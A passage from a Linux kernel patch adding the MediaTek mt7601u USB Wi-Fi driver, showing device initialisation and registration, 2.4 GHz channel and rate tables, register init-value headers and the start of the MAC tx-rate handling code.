MT_BEACON_TIME_CFG_TBTT_EN | + MT_BEACON_TIME_CFG_BEACON_TX)); + + mt7601u_reset_counters(dev); + + mt7601u_rmw(dev, MT_US_CYC_CFG, MT_US_CYC_CNT, 0x1e); + + mt7601u_wr(dev, MT_TXOP_CTRL_CFG, MT76_SET(MT_TXOP_TRUN_EN, 0x3f) | + MT76_SET(MT_TXOP_EXT_CCA_DLY, 0x58)); + + ret = mt7601u_eeprom_init(dev); + if (ret) + goto err_rx; + + ret = mt7601u_phy_init(dev); + if (ret) + goto err_rx; + + mt7601u_set_rx_path(dev, 0); + mt7601u_set_tx_dac(dev, 0); + + mt7601u_mac_set_ctrlch(dev, false); + mt7601u_bbp_set_ctrlch(dev, false); + mt7601u_bbp_set_bw(dev, MT_BW_20); + + return 0; + +err_rx: + mt7601u_dma_cleanup(dev); +err_mcu: + mt7601u_mcu_cmd_deinit(dev); +err: + mt7601u_chip_onoff(dev, false, false); + return ret; +} + +void mt7601u_cleanup(struct mt7601u_dev *dev) +{ + mt7601u_stop_hardware(dev); + mt7601u_dma_cleanup(dev); + mt7601u_mcu_cmd_deinit(dev); +} + +struct mt7601u_dev *mt7601u_alloc_device(struct device *pdev) +{ + struct ieee80211_hw *hw; + struct mt7601u_dev *dev; + + hw = ieee80211_alloc_hw(sizeof(*dev), &mt7601u_ops); + if (!hw) + return NULL; + + dev = hw->priv; + dev->dev = pdev; + dev->hw = hw; + mutex_init(&dev->vendor_req_mutex); + mutex_init(&dev->reg_atomic_mutex); + mutex_init(&dev->hw_atomic_mutex); + mutex_init(&dev->mutex); + spin_lock_init(&dev->tx_lock); + spin_lock_init(&dev->rx_lock); + spin_lock_init(&dev->lock); + spin_lock_init(&dev->con_mon_lock); + atomic_set(&dev->avg_ampdu_len, 1); + + dev->stat_wq = alloc_workqueue("mt7601u", WQ_UNBOUND, 0); + if (!dev->stat_wq) { + ieee80211_free_hw(hw); + return NULL; + } + + return dev; +} + +#define CHAN2G(_idx, _freq) { \ + .band = IEEE80211_BAND_2GHZ, \ + .center_freq = (_freq), \ + .hw_value = (_idx), \ + .max_power = 30, \ +} + +static const struct ieee80211_channel mt76_channels_2ghz[] = { + CHAN2G(1, 2412), + CHAN2G(2, 2417), + CHAN2G(3, 2422), + CHAN2G(4, 2427), + CHAN2G(5, 2432), + CHAN2G(6, 2437), + CHAN2G(7, 2442), + CHAN2G(8, 2447), + CHAN2G(9, 2452), + CHAN2G(10, 2457), + CHAN2G(11, 2462), + CHAN2G(12, 2467), + CHAN2G(13, 2472), + CHAN2G(14, 2484), +}; + +#define CCK_RATE(_idx, _rate) { \ + .bitrate = _rate, \ + .flags = IEEE80211_RATE_SHORT_PREAMBLE, \ + .hw_value = (MT_PHY_TYPE_CCK << 8) | _idx, \ + .hw_value_short = (MT_PHY_TYPE_CCK << 8) | (8 + _idx), \ +} + +#define OFDM_RATE(_idx, _rate) { \ + .bitrate = _rate, \ + .hw_value = (MT_PHY_TYPE_OFDM << 8) | _idx, \ + .hw_value_short = (MT_PHY_TYPE_OFDM << 8) | _idx, \ +} + +static struct ieee80211_rate mt76_rates[] = { + CCK_RATE(0, 10), + CCK_RATE(1, 20), + CCK_RATE(2, 55), + CCK_RATE(3, 110), + OFDM_RATE(0, 60), + OFDM_RATE(1, 90), + OFDM_RATE(2, 120), + OFDM_RATE(3, 180), + OFDM_RATE(4, 240), + OFDM_RATE(5, 360), + OFDM_RATE(6, 480), + OFDM_RATE(7, 540), +}; + +static int +mt76_init_sband(struct mt7601u_dev *dev, struct ieee80211_supported_band *sband, + const struct ieee80211_channel *chan, int n_chan, + struct ieee80211_rate *rates, int n_rates) +{ + struct ieee80211_sta_ht_cap *ht_cap; + void *chanlist; + int size; + + size = n_chan * sizeof(*chan); + chanlist = devm_kmemdup(dev->dev, chan, size, GFP_KERNEL); + if (!chanlist) + return -ENOMEM; + + sband->channels = chanlist; + sband->n_channels = n_chan; + sband->bitrates = rates; + sband->n_bitrates = n_rates; + + ht_cap = &sband->ht_cap; + ht_cap->ht_supported = true; + ht_cap->cap = IEEE80211_HT_CAP_SUP_WIDTH_20_40 | + IEEE80211_HT_CAP_GRN_FLD | + IEEE80211_HT_CAP_SGI_20 | + IEEE80211_HT_CAP_SGI_40 | + (1 << IEEE80211_HT_CAP_RX_STBC_SHIFT); + + ht_cap->mcs.rx_mask[0] = 0xff; + ht_cap->mcs.rx_mask[4] = 0x1; + ht_cap->mcs.tx_params = IEEE80211_HT_MCS_TX_DEFINED; + ht_cap->ampdu_factor = IEEE80211_HT_MAX_AMPDU_64K; + ht_cap->ampdu_density = IEEE80211_HT_MPDU_DENSITY_2; + + dev->chandef.chan = &sband->channels[0]; + + return 0; +} + +static int +mt76_init_sband_2g(struct mt7601u_dev *dev) +{ + dev->sband_2g = devm_kzalloc(dev->dev, sizeof(*dev->sband_2g), + GFP_KERNEL); + dev->hw->wiphy->bands[IEEE80211_BAND_2GHZ] = dev->sband_2g; + + WARN_ON(dev->ee->reg.start - 1 + dev->ee->reg.num > + ARRAY_SIZE(mt76_channels_2ghz)); + + return mt76_init_sband(dev, dev->sband_2g, + &mt76_channels_2ghz[dev->ee->reg.start - 1], + dev->ee->reg.num, + mt76_rates, ARRAY_SIZE(mt76_rates)); +} + +int mt7601u_register_device(struct mt7601u_dev *dev) +{ + struct ieee80211_hw *hw = dev->hw; + struct wiphy *wiphy = hw->wiphy; + int ret; + + /* Reserve WCID 0 for mcast - thanks to this APs WCID will go to + * entry no. 1 like it does in the vendor driver. + */ + dev->wcid_mask[0] |= 1; + + /* init fake wcid for monitor interfaces */ + dev->mon_wcid = devm_kmalloc(dev->dev, sizeof(*dev->mon_wcid), + GFP_KERNEL); + if (!dev->mon_wcid) + return -ENOMEM; + dev->mon_wcid->idx = 0xff; + dev->mon_wcid->hw_key_idx = -1; + + SET_IEEE80211_DEV(hw, dev->dev); + + hw->queues = 4; + hw->flags = IEEE80211_HW_SIGNAL_DBM | + IEEE80211_HW_PS_NULLFUNC_STACK | + IEEE80211_HW_SUPPORTS_HT_CCK_RATES | + IEEE80211_HW_AMPDU_AGGREGATION | + IEEE80211_HW_SUPPORTS_RC_TABLE; + hw->max_rates = 1; + hw->max_report_rates = 7; + hw->max_rate_tries = 1; + + hw->sta_data_size = sizeof(struct mt76_sta); + hw->vif_data_size = sizeof(struct mt76_vif); + + SET_IEEE80211_PERM_ADDR(hw, dev->macaddr); + + wiphy->features |= NL80211_FEATURE_ACTIVE_MONITOR; + wiphy->interface_modes = BIT(NL80211_IFTYPE_STATION); + + ret = mt76_init_sband_2g(dev); + if (ret) + return ret; + + INIT_DELAYED_WORK(&dev->mac_work, mt7601u_mac_work); + INIT_DELAYED_WORK(&dev->stat_work, mt7601u_tx_stat); + + ret = ieee80211_register_hw(hw); + if (ret) + return ret; + + mt7601u_init_debugfs(dev); + + return 0; +} diff --git a/drivers/net/wireless/mediatek/mt7601u/initvals.h b/drivers/net/wireless/mediatek/mt7601u/initvals.h new file mode 100644 index 000000000000..ec11ff66969d --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/initvals.h @@ -0,0 +1,164 @@ +/* + * (c) Copyright 2002-2010, Ralink Technology, Inc. + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#ifndef __MT7601U_INITVALS_H +#define __MT7601U_INITVALS_H + +static const struct mt76_reg_pair bbp_common_vals[] = { + { 65, 0x2c }, + { 66, 0x38 }, + { 68, 0x0b }, + { 69, 0x12 }, + { 70, 0x0a }, + { 73, 0x10 }, + { 81, 0x37 }, + { 82, 0x62 }, + { 83, 0x6a }, + { 84, 0x99 }, + { 86, 0x00 }, + { 91, 0x04 }, + { 92, 0x00 }, + { 103, 0x00 }, + { 105, 0x05 }, + { 106, 0x35 }, +}; + +static const struct mt76_reg_pair bbp_chip_vals[] = { + { 1, 0x04 }, { 4, 0x40 }, { 20, 0x06 }, { 31, 0x08 }, + /* CCK Tx Control */ + { 178, 0xff }, + /* AGC/Sync controls */ + { 66, 0x14 }, { 68, 0x8b }, { 69, 0x12 }, { 70, 0x09 }, + { 73, 0x11 }, { 75, 0x60 }, { 76, 0x44 }, { 84, 0x9a }, + { 86, 0x38 }, { 91, 0x07 }, { 92, 0x02 }, + /* Rx Path Controls */ + { 99, 0x50 }, { 101, 0x00 }, { 103, 0xc0 }, { 104, 0x92 }, + { 105, 0x3c }, { 106, 0x03 }, { 128, 0x12 }, + /* Change RXWI content: Gain Report */ + { 142, 0x04 }, { 143, 0x37 }, + /* Change RXWI content: Antenna Report */ + { 142, 0x03 }, { 143, 0x99 }, + /* Calibration Index Register */ + /* CCK Receiver Control */ + { 160, 0xeb }, { 161, 0xc4 }, { 162, 0x77 }, { 163, 0xf9 }, + { 164, 0x88 }, { 165, 0x80 }, { 166, 0xff }, { 167, 0xe4 }, + /* Added AGC controls - these AGC/GLRT registers are accessed + * through R195 and R196. + */ + { 195, 0x00 }, { 196, 0x00 }, + { 195, 0x01 }, { 196, 0x04 }, + { 195, 0x02 }, { 196, 0x20 }, + { 195, 0x03 }, { 196, 0x0a }, + { 195, 0x06 }, { 196, 0x16 }, + { 195, 0x07 }, { 196, 0x05 }, + { 195, 0x08 }, { 196, 0x37 }, + { 195, 0x0a }, { 196, 0x15 }, + { 195, 0x0b }, { 196, 0x17 }, + { 195, 0x0c }, { 196, 0x06 }, + { 195, 0x0d }, { 196, 0x09 }, + { 195, 0x0e }, { 196, 0x05 }, + { 195, 0x0f }, { 196, 0x09 }, + { 195, 0x10 }, { 196, 0x20 }, + { 195, 0x20 }, { 196, 0x17 }, + { 195, 0x21 }, { 196, 0x06 }, + { 195, 0x22 }, { 196, 0x09 }, + { 195, 0x23 }, { 196, 0x17 }, + { 195, 0x24 }, { 196, 0x06 }, + { 195, 0x25 }, { 196, 0x09 }, + { 195, 0x26 }, { 196, 0x17 }, + { 195, 0x27 }, { 196, 0x06 }, + { 195, 0x28 }, { 196, 0x09 }, + { 195, 0x29 }, { 196, 0x05 }, + { 195, 0x2a }, { 196, 0x09 }, + { 195, 0x80 }, { 196, 0x8b }, + { 195, 0x81 }, { 196, 0x12 }, + { 195, 0x82 }, { 196, 0x09 }, + { 195, 0x83 }, { 196, 0x17 }, + { 195, 0x84 }, { 196, 0x11 }, + { 195, 0x85 }, { 196, 0x00 }, + { 195, 0x86 }, { 196, 0x00 }, + { 195, 0x87 }, { 196, 0x18 }, + { 195, 0x88 }, { 196, 0x60 }, + { 195, 0x89 }, { 196, 0x44 }, + { 195, 0x8a }, { 196, 0x8b }, + { 195, 0x8b }, { 196, 0x8b }, + { 195, 0x8c }, { 196, 0x8b }, + { 195, 0x8d }, { 196, 0x8b }, + { 195, 0x8e }, { 196, 0x09 }, + { 195, 0x8f }, { 196, 0x09 }, + { 195, 0x90 }, { 196, 0x09 }, + { 195, 0x91 }, { 196, 0x09 }, + { 195, 0x92 }, { 196, 0x11 }, + { 195, 0x93 }, { 196, 0x11 }, + { 195, 0x94 }, { 196, 0x11 }, + { 195, 0x95 }, { 196, 0x11 }, + /* PPAD */ + { 47, 0x80 }, { 60, 0x80 }, { 150, 0xd2 }, { 151, 0x32 }, + { 152, 0x23 }, { 153, 0x41 }, { 154, 0x00 }, { 155, 0x4f }, + { 253, 0x7e }, { 195, 0x30 }, { 196, 0x32 }, { 195, 0x31 }, + { 196, 0x23 }, { 195, 0x32 }, { 196, 0x45 }, { 195, 0x35 }, + { 196, 0x4a }, { 195, 0x36 }, { 196, 0x5a }, { 195, 0x37 }, + { 196, 0x5a }, +}; + +static const struct mt76_reg_pair mac_common_vals[] = { + { MT_LEGACY_BASIC_RATE, 0x0000013f }, + { MT_HT_BASIC_RATE, 0x00008003 }, + { MT_MAC_SYS_CTRL, 0x00000000 }, + { MT_RX_FILTR_CFG, 0x00017f97 }, + { MT_BKOFF_SLOT_CFG, 0x00000209 }, + { MT_TX_SW_CFG0, 0x00000000 }, + { MT_TX_SW_CFG1, 0x00080606 }, + { MT_TX_LINK_CFG, 0x00001020 }, + { MT_TX_TIMEOUT_CFG, 0x000a2090 }, + { MT_MAX_LEN_CFG, 0x00003fff }, + { MT_PBF_TX_MAX_PCNT, 0x1fbf1f1f }, + { MT_PBF_RX_MAX_PCNT, 0x0000009f }, + { MT_TX_RETRY_CFG, 0x47d01f0f }, + { MT_AUTO_RSP_CFG, 0x00000013 }, + { MT_CCK_PROT_CFG, 0x05740003 }, + { MT_OFDM_PROT_CFG, 0x05740003 }, + { MT_MM40_PROT_CFG, 0x03f44084 }, + { MT_GF20_PROT_CFG, 0x01744004 }, + { MT_GF40_PROT_CFG, 0x03f44084 }, + { MT_MM20_PROT_CFG, 0x01744004 }, + { MT_TXOP_CTRL_CFG, 0x0000583f }, + { MT_TX_RTS_CFG, 0x01092b20 }, + { MT_EXP_ACK_TIME, 0x002400ca }, + { MT_TXOP_HLDR_ET, 0x00000002 }, + { MT_XIFS_TIME_CFG, 0x33a41010 }, + { MT_PWR_PIN_CFG, 0x00000000 }, +}; + +static const struct mt76_reg_pair mac_chip_vals[] = { + { MT_TSO_CTRL, 0x00006050 }, + { MT_BCN_OFFSET(0), 0x18100800 }, + { MT_BCN_OFFSET(1), 0x38302820 }, + { MT_PBF_SYS_CTRL, 0x00080c00 }, + { MT_PBF_CFG, 0x7f723c1f }, + { MT_FCE_PSE_CTRL, 0x00000001 }, + { MT_PAUSE_ENABLE_CONTROL1, 0x00000000 }, + { MT_TX0_RF_GAIN_CORR, 0x003b0005 }, + { MT_TX0_RF_GAIN_ATTEN, 0x00006900 }, + { MT_TX0_BB_GAIN_ATTEN, 0x00000400 }, + { MT_TX_ALC_VGA3, 0x00060006 }, + { MT_TX_SW_CFG0, 0x00000402 }, + { MT_TX_SW_CFG1, 0x00000000 }, + { MT_TX_SW_CFG2, 0x00000000 }, + { MT_HEADER_TRANS_CTRL_REG, 0x00000000 }, + { MT_FCE_CSO, 0x0000030f }, + { MT_FCE_PARAMETERS, 0x00256f0f }, +}; + +#endif diff --git a/drivers/net/wireless/mediatek/mt7601u/initvals_phy.h b/drivers/net/wireless/mediatek/mt7601u/initvals_phy.h new file mode 100644 index 000000000000..a2bdc3e322bf --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/initvals_phy.h @@ -0,0 +1,291 @@ +/* + * (c) Copyright 2002-2010, Ralink Technology, Inc. + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#ifndef __MT7601U_PHY_INITVALS_H +#define __MT7601U_PHY_INITVALS_H + +#define RF_REG_PAIR(bank, reg, value) \ + { MT_MCU_MEMMAP_RF | (bank) << 16 | (reg), value } + +static const struct mt76_reg_pair rf_central[] = { + /* Bank 0 - for central blocks: BG, PLL, XTAL, LO, ADC/DAC */ + RF_REG_PAIR(0, 0, 0x02), + RF_REG_PAIR(0, 1, 0x01), + RF_REG_PAIR(0, 2, 0x11), + RF_REG_PAIR(0, 3, 0xff), + RF_REG_PAIR(0, 4, 0x0a), + RF_REG_PAIR(0, 5, 0x20), + RF_REG_PAIR(0, 6, 0x00), + /* B/G */ + RF_REG_PAIR(0, 7, 0x00), + RF_REG_PAIR(0, 8, 0x00), + RF_REG_PAIR(0, 9, 0x00), + RF_REG_PAIR(0, 10, 0x00), + RF_REG_PAIR(0, 11, 0x21), + /* XO */ + RF_REG_PAIR(0, 13, 0x00), /* 40mhz xtal */ + /* RF_REG_PAIR(0, 13, 0x13), */ /* 20mhz xtal */ + RF_REG_PAIR(0, 14, 0x7c), + RF_REG_PAIR(0, 15, 0x22), + RF_REG_PAIR(0, 16, 0x80), + /* PLL */ + RF_REG_PAIR(0, 17, 0x99), + RF_REG_PAIR(0, 18, 0x99), + RF_REG_PAIR(0, 19, 0x09), + RF_REG_PAIR(0, 20, 0x50), + RF_REG_PAIR(0, 21, 0xb0), + RF_REG_PAIR(0, 22, 0x00), + RF_REG_PAIR(0, 23, 0xc5), + RF_REG_PAIR(0, 24, 0xfc), + RF_REG_PAIR(0, 25, 0x40), + RF_REG_PAIR(0, 26, 0x4d), + RF_REG_PAIR(0, 27, 0x02), + RF_REG_PAIR(0, 28, 0x72), + RF_REG_PAIR(0, 29, 0x01), + RF_REG_PAIR(0, 30, 0x00), + RF_REG_PAIR(0, 31, 0x00), + /* test ports */ + RF_REG_PAIR(0, 32, 0x00), + RF_REG_PAIR(0, 33, 0x00), + RF_REG_PAIR(0, 34, 0x23), + RF_REG_PAIR(0, 35, 0x01), /* change setting to reduce spurs */ + RF_REG_PAIR(0, 36, 0x00), + RF_REG_PAIR(0, 37, 0x00), + /* ADC/DAC */ + RF_REG_PAIR(0, 38, 0x00), + RF_REG_PAIR(0, 39, 0x20), + RF_REG_PAIR(0, 40, 0x00), + RF_REG_PAIR(0, 41, 0xd0), + RF_REG_PAIR(0, 42, 0x1b), + RF_REG_PAIR(0, 43, 0x02), + RF_REG_PAIR(0, 44, 0x00), +}; + +static const struct mt76_reg_pair rf_channel[] = { + RF_REG_PAIR(4, 0, 0x01), + RF_REG_PAIR(4, 1, 0x00), + RF_REG_PAIR(4, 2, 0x00), + RF_REG_PAIR(4, 3, 0x00), + /* LDO */ + RF_REG_PAIR(4, 4, 0x00), + RF_REG_PAIR(4, 5, 0x08), + RF_REG_PAIR(4, 6, 0x00), + /* RX */ + RF_REG_PAIR(4, 7, 0x5b), + RF_REG_PAIR(4, 8, 0x52), + RF_REG_PAIR(4, 9, 0xb6), + RF_REG_PAIR(4, 10, 0x57), + RF_REG_PAIR(4, 11, 0x33), + RF_REG_PAIR(4, 12, 0x22), + RF_REG_PAIR(4, 13, 0x3d), + RF_REG_PAIR(4, 14, 0x3e), + RF_REG_PAIR(4, 15, 0x13), + RF_REG_PAIR(4, 16, 0x22), + RF_REG_PAIR(4, 17, 0x23), + RF_REG_PAIR(4, 18, 0x02), + RF_REG_PAIR(4, 19, 0xa4), + RF_REG_PAIR(4, 20, 0x01), + RF_REG_PAIR(4, 21, 0x12), + RF_REG_PAIR(4, 22, 0x80), + RF_REG_PAIR(4, 23, 0xb3), + RF_REG_PAIR(4, 24, 0x00), /* reserved */ + RF_REG_PAIR(4, 25, 0x00), /* reserved */ + RF_REG_PAIR(4, 26, 0x00), /* reserved */ + RF_REG_PAIR(4, 27, 0x00), /* reserved */ + /* LOGEN */ + RF_REG_PAIR(4, 28, 0x18), + RF_REG_PAIR(4, 29, 0xee), + RF_REG_PAIR(4, 30, 0x6b), + RF_REG_PAIR(4, 31, 0x31), + RF_REG_PAIR(4, 32, 0x5d), + RF_REG_PAIR(4, 33, 0x00), /* reserved */ + /* TX */ + RF_REG_PAIR(4, 34, 0x96), + RF_REG_PAIR(4, 35, 0x55), + RF_REG_PAIR(4, 36, 0x08), + RF_REG_PAIR(4, 37, 0xbb), + RF_REG_PAIR(4, 38, 0xb3), + RF_REG_PAIR(4, 39, 0xb3), + RF_REG_PAIR(4, 40, 0x03), + RF_REG_PAIR(4, 41, 0x00), /* reserved */ + RF_REG_PAIR(4, 42, 0x00), /* reserved */ + RF_REG_PAIR(4, 43, 0xc5), + RF_REG_PAIR(4, 44, 0xc5), + RF_REG_PAIR(4, 45, 0xc5), + RF_REG_PAIR(4, 46, 0x07), + RF_REG_PAIR(4, 47, 0xa8), + RF_REG_PAIR(4, 48, 0xef), + RF_REG_PAIR(4, 49, 0x1a), + /* PA */ + RF_REG_PAIR(4, 54, 0x07), + RF_REG_PAIR(4, 55, 0xa7), + RF_REG_PAIR(4, 56, 0xcc), + RF_REG_PAIR(4, 57, 0x14), + RF_REG_PAIR(4, 58, 0x07), + RF_REG_PAIR(4, 59, 0xa8), + RF_REG_PAIR(4, 60, 0xd7), + RF_REG_PAIR(4, 61, 0x10), + RF_REG_PAIR(4, 62, 0x1c), + RF_REG_PAIR(4, 63, 0x00), /* reserved */ +}; + +static const struct mt76_reg_pair rf_vga[] = { + RF_REG_PAIR(5, 0, 0x47), + RF_REG_PAIR(5, 1, 0x00), + RF_REG_PAIR(5, 2, 0x00), + RF_REG_PAIR(5, 3, 0x08), + RF_REG_PAIR(5, 4, 0x04), + RF_REG_PAIR(5, 5, 0x20), + RF_REG_PAIR(5, 6, 0x3a), + RF_REG_PAIR(5, 7, 0x3a), + RF_REG_PAIR(5, 8, 0x00), + RF_REG_PAIR(5, 9, 0x00), + RF_REG_PAIR(5, 10, 0x10), + RF_REG_PAIR(5, 11, 0x10), + RF_REG_PAIR(5, 12, 0x10), + RF_REG_PAIR(5, 13, 0x10), + RF_REG_PAIR(5, 14, 0x10), + RF_REG_PAIR(5, 15, 0x20), + RF_REG_PAIR(5, 16, 0x22), + RF_REG_PAIR(5, 17, 0x7c), + RF_REG_PAIR(5, 18, 0x00), + RF_REG_PAIR(5, 19, 0x00), + RF_REG_PAIR(5, 20, 0x00), + RF_REG_PAIR(5, 21, 0xf1), + RF_REG_PAIR(5, 22, 0x11), + RF_REG_PAIR(5, 23, 0x02), + RF_REG_PAIR(5, 24, 0x41), + RF_REG_PAIR(5, 25, 0x20), + RF_REG_PAIR(5, 26, 0x00), + RF_REG_PAIR(5, 27, 0xd7), + RF_REG_PAIR(5, 28, 0xa2), + RF_REG_PAIR(5, 29, 0x20), + RF_REG_PAIR(5, 30, 0x49), + RF_REG_PAIR(5, 31, 0x20), + RF_REG_PAIR(5, 32, 0x04), + RF_REG_PAIR(5, 33, 0xf1), + RF_REG_PAIR(5, 34, 0xa1), + RF_REG_PAIR(5, 35, 0x01), + RF_REG_PAIR(5, 41, 0x00), + RF_REG_PAIR(5, 42, 0x00), + RF_REG_PAIR(5, 43, 0x00), + RF_REG_PAIR(5, 44, 0x00), + RF_REG_PAIR(5, 45, 0x00), + RF_REG_PAIR(5, 46, 0x00), + RF_REG_PAIR(5, 47, 0x00), + RF_REG_PAIR(5, 48, 0x00), + RF_REG_PAIR(5, 49, 0x00), + RF_REG_PAIR(5, 50, 0x00), + RF_REG_PAIR(5, 51, 0x00), + RF_REG_PAIR(5, 52, 0x00), + RF_REG_PAIR(5, 53, 0x00), + RF_REG_PAIR(5, 54, 0x00), + RF_REG_PAIR(5, 55, 0x00), + RF_REG_PAIR(5, 56, 0x00), + RF_REG_PAIR(5, 57, 0x00), + RF_REG_PAIR(5, 58, 0x31), + RF_REG_PAIR(5, 59, 0x31), + RF_REG_PAIR(5, 60, 0x0a), + RF_REG_PAIR(5, 61, 0x02), + RF_REG_PAIR(5, 62, 0x00), + RF_REG_PAIR(5, 63, 0x00), +}; + +/* TODO: BBP178 is set to 0xff for "CCK CH14 OBW" which overrides the settings + * from channel switching. Seems stupid at best. + */ +static const struct mt76_reg_pair bbp_high_temp[] = { + { 75, 0x60 }, + { 92, 0x02 }, + { 178, 0xff }, /* For CCK CH14 OBW */ + { 195, 0x88 }, { 196, 0x60 }, +}, bbp_high_temp_bw20[] = { + { 69, 0x12 }, + { 91, 0x07 }, + { 195, 0x23 }, { 196, 0x17 }, + { 195, 0x24 }, { 196, 0x06 }, + { 195, 0x81 }, { 196, 0x12 }, + { 195, 0x83 }, { 196, 0x17 }, +}, bbp_high_temp_bw40[] = { + { 69, 0x15 }, + { 91, 0x04 }, + { 195, 0x23 }, { 196, 0x12 }, + { 195, 0x24 }, { 196, 0x08 }, + { 195, 0x81 }, { 196, 0x15 }, + { 195, 0x83 }, { 196, 0x16 }, +}, bbp_low_temp[] = { + { 178, 0xff }, /* For CCK CH14 OBW */ +}, bbp_low_temp_bw20[] = { + { 69, 0x12 }, + { 75, 0x5e }, + { 91, 0x07 }, + { 92, 0x02 }, + { 195, 0x23 }, { 196, 0x17 }, + { 195, 0x24 }, { 196, 0x06 }, + { 195, 0x81 }, { 196, 0x12 }, + { 195, 0x83 }, { 196, 0x17 }, + { 195, 0x88 }, { 196, 0x5e }, +}, bbp_low_temp_bw40[] = { + { 69, 0x15 }, + { 75, 0x5c }, + { 91, 0x04 }, + { 92, 0x03 }, + { 195, 0x23 }, { 196, 0x10 }, + { 195, 0x24 }, { 196, 0x08 }, + { 195, 0x81 }, { 196, 0x15 }, + { 195, 0x83 }, { 196, 0x16 }, + { 195, 0x88 }, { 196, 0x5b }, +}, bbp_normal_temp[] = { + { 75, 0x60 }, + { 92, 0x02 }, + { 178, 0xff }, /* For CCK CH14 OBW */ + { 195, 0x88 }, { 196, 0x60 }, +}, bbp_normal_temp_bw20[] = { + { 69, 0x12 }, + { 91, 0x07 }, + { 195, 0x23 }, { 196, 0x17 }, + { 195, 0x24 }, { 196, 0x06 }, + { 195, 0x81 }, { 196, 0x12 }, + { 195, 0x83 }, { 196, 0x17 }, +}, bbp_normal_temp_bw40[] = { + { 69, 0x15 }, + { 91, 0x04 }, + { 195, 0x23 }, { 196, 0x12 }, + { 195, 0x24 }, { 196, 0x08 }, + { 195, 0x81 }, { 196, 0x15 }, + { 195, 0x83 }, { 196, 0x16 }, +}; + +#define BBP_TABLE(arr) { arr, ARRAY_SIZE(arr), } + +static const struct reg_table { + const struct mt76_reg_pair *regs; + size_t n; +} bbp_mode_table[3][3] = { + { + BBP_TABLE(bbp_normal_temp_bw20), + BBP_TABLE(bbp_normal_temp_bw40), + BBP_TABLE(bbp_normal_temp), + }, { + BBP_TABLE(bbp_high_temp_bw20), + BBP_TABLE(bbp_high_temp_bw40), + BBP_TABLE(bbp_high_temp), + }, { + BBP_TABLE(bbp_low_temp_bw20), + BBP_TABLE(bbp_low_temp_bw40), + BBP_TABLE(bbp_low_temp), + } +}; + +#endif diff --git a/drivers/net/wireless/mediatek/mt7601u/mac.c b/drivers/net/wireless/mediatek/mt7601u/mac.c new file mode 100644 index 000000000000..c161bcc6a7fa --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/mac.c @@ -0,0 +1,569 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include "mt7601u.h" +#include "trace.h" +#include + +static void +mt76_mac_process_tx_rate(struct ieee80211_tx_rate *txrate, u16 rate) +{ + u8 idx = MT76_GET(MT_TXWI_RATE_MCS, rate); + + txrate->idx = 0; + txrate->flags = 0; + txrate->count = 1; + + switch (MT76_GET(MT_TXWI_RATE_PHY_MODE, rate)) { + case MT_PHY_TYPE_OFDM: + txrate->idx = idx + 4; + return; + case MT_PHY_TYPE_CCK: + if (idx >= 8) + idx -= 8; + + txrate->idx = idx; + return; + case MT_PHY_TYPE_HT_GF: + txrate->flags |= IEEE80211_TX_RC_GREEN_FIELD; + /* fall through */ + case MT_PHY_TYPE_HT: + txrate->flags |= IEEE80211_TX_RC_MCS; + txrate->idx = idx; + break; + default: + WARN_ON(1); + return; + } + + if (MT76_GET(MT_TXWI_RATE_BW, rate) == MT_PHY_BW_40) + txrate->flags |= IEEE80211_TX_RC_40_MHZ_WIDTH; + + if (rate & MT_TXWI_RATE_SGI) + txrate->flags |= IEEE80211_TX_RC_SHORT_GI; +} + +static void +mt76_mac_fill_tx_status(struct mt7601u_dev *dev, struct ieee80211_tx_info *info, + struct mt76_tx_status *st) +{ + struct ieee80211_tx_rate *rate = info->status.rates; + int cur_idx, last_rate; + int i; + + last_rate = min_t(int, st->retry, IEEE80211_TX_MAX_RATES - 1); + mt76_mac_process_tx_rate(&rate[last_rate], st->rate); + if (last_rate < IEEE80211_TX_MAX_RATES - 1) + rate[last_rate + 1].idx = -1; + + cur_idx = rate[last_rate].idx + st->retry; + for (i = 0; i <= last_rate; i++) { + rate[i].flags = rate[last_rate].flags; + rate[i].idx = max_t(int, 0, cur_idx - i); + rate[i].count = 1; + } + + if (last_rate > 0) + rate[last_rate - 1].count = st->retry + 1 - last_rate; + + info->status.ampdu_len = 1; + info->status.ampdu_ack_len = st->success; + + if (st->is_probe) + info->flags |= IEEE80211_TX_CTL_RATE_CTRL_PROBE; + + if (st->aggr) + info->flags |= IEEE80211_TX_CTL_AMPDU | + IEEE80211_TX_STAT_AMPDU; + + if (!st->ack_req) + info->flags |= IEEE80211_TX_CTL_NO_ACK; + else if (st->success) + info->flags |= IEEE80211_TX_STAT_ACK; +} + +u16 mt76_mac_tx_rate_val(struct mt7601u_dev *dev, + const struct ieee80211_tx_rate *rate, u8 *nss_val) +{ + u16 rateval; + u8 phy, rate_idx; + u8 nss = 1; + u8 bw = 0; + + if (rate->flags & IEEE80211_TX_RC_MCS) { + rate_idx = rate->idx; + nss = 1 + (rate->idx >> 3); + phy = MT_PHY_TYPE_HT; + if (rate->flags & IEEE80211_TX_RC_GREEN_FIELD) + phy = MT_PHY_TYPE_HT_GF; + if (rate->flags & IEEE80211_TX_RC_40_MHZ_WIDTH) + bw = 1; + } else { + const struct ieee80211_rate *r; + int band = dev->chandef.chan->band; + u16 val; + + r = &dev->hw->wiphy->bands[band]->bitrates[rate->idx]; + if (rate->flags & IEEE80211_TX_RC_USE_SHORT_PREAMBLE) + val = r->hw_value_short; + else + val = r->hw_value; + + phy = val 